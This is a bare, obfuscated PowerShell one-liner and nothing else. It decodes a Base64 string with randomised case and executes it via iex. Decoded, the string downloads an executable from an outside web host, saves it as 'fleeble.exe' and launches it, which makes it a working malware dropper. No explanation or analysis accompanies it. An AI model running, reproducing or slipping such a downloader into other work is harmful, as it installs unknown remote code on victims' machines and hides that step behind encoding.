iex([SYsTEM.tEXt.eNcODinG]::UTF8.GEtStrIng([SYSTEm.CONVErt]::FROMbASe64StrING('CihOZXctT2JqZWN0IHNZU1RlbS5OZXQuV2ViQ0xJZU5UKS5Eb1dOTG9BZGZpTEUoJ2h0dHA6Ly9tYXRrYWx2LjVnYmZyZWUuY29tL293ZWUvb3dlLmV4ZScsJ2ZsZWVibGUuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWJsZS5leGUnCgo=')));exit